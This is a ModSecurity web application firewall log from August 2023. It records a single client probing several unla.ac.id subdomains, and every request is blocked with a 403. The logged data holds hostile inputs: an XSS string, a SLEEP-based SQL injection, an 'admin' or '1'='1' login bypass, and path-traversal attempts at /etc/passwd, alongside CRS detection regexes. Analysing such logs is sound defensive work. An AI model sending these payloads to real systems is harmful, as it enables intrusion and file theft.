[Tue Aug 29 11:43:57.374526 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAe8l7AAAAAF"]
[Tue Aug 29 11:43:57.378316 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfcoMUAAAAa"]
[Tue Aug 29 11:43:57.379303 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfEBwAAAAAO"]
[Tue Aug 29 11:43:57.395992 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfiYjsAAAAg"]
[Tue Aug 29 11:43:57.398892 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfcoMYAAAAa"]
[Tue Aug 29 11:43:57.416056 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jcCo-f0AAAfiYjwAAAAg"]
[Tue Aug 29 11:43:58.379398 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfg7vsAAAAe"]
[Tue Aug 29 11:43:58.382306 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfiYj8AAAAg"]
[Tue Aug 29 11:43:58.388230 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdOeXwAAAAS"]
[Tue Aug 29 11:43:58.392843 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdQ3oMAAAAV"]
[Tue Aug 29 11:43:58.395075 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAc4EuQAAAAP"]
[Tue Aug 29 11:43:58.401733 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jsCo-f0AAAfFKBgAAAAR"]
[Tue Aug 29 11:43:58.404900 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jsCo-f0AAAfiYkAAAAAg"]
[Tue Aug 29 11:43:59.367589 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAcsLPMAAAAE"]
[Tue Aug 29 11:43:59.376138 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13j8Co-f0AAAfiYkQAAAAg"]
[Tue Aug 29 11:43:59.378741 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAdb7vsAAAAb"]
[Tue Aug 29 11:43:59.381442 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfZj1EAAAAN"]
[Tue Aug 29 11:43:59.387350 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAfFKBsAAAAR"]
[Tue Aug 29 11:43:59.387877 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13j8Co-f0AAAenGdkAAAAM"]
[Tue Aug 29 11:44:00.266496 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "182.2.231.232_e751e2b8582d017966dab0d237fa5c54c17392ad"): Internal error [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13j8Co-f0AAAfcoM0AAAAa"]
[Tue Aug 29 11:44:00.999126 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/hms/admin/"] [unique_id "ZO13kMCo-f0AAAftVBsAAAAf"]
[Tue Aug 29 11:44:03.447939 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdQ3okAAAAV"]
[Tue Aug 29 11:44:03.450652 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LEAAAAK"]
[Tue Aug 29 11:44:03.468798 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAdQ3ooAAAAV"]
[Tue Aug 29 11:44:03.471359 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAfcoNcAAAAa"]
[Tue Aug 29 11:44:03.539485 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Fun. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../ found within ARGS:Fun: msaDataCenetrDownLoadMore delflag=1 downLoadFileName=msagroup.txt downLoadFile=../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/msa/main.xp"] [unique_id "ZO13k8Co-f0AAAeX1LUAAAAK"]
[Tue Aug 29 11:44:03.622506 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO13k8Co-f0AAAdb7w4AAAAb"]
